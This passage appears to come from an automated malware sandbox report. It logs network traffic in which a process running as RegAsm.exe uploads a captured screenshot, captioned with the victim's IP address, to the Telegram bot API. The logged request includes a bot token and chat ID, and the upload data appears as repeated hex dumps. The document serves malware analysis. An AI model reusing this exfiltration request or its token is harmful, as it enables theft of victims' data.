                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:39:19 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:20 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:20 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.2.449970149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:21 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd3d05872645cb
                                                                            Host: api.telegram.org
                                                                            Content-Length: 696547
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 64 30 35 38 37 32 36 34 35 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd3d05872645cbContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:39:21 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:23 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:22 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
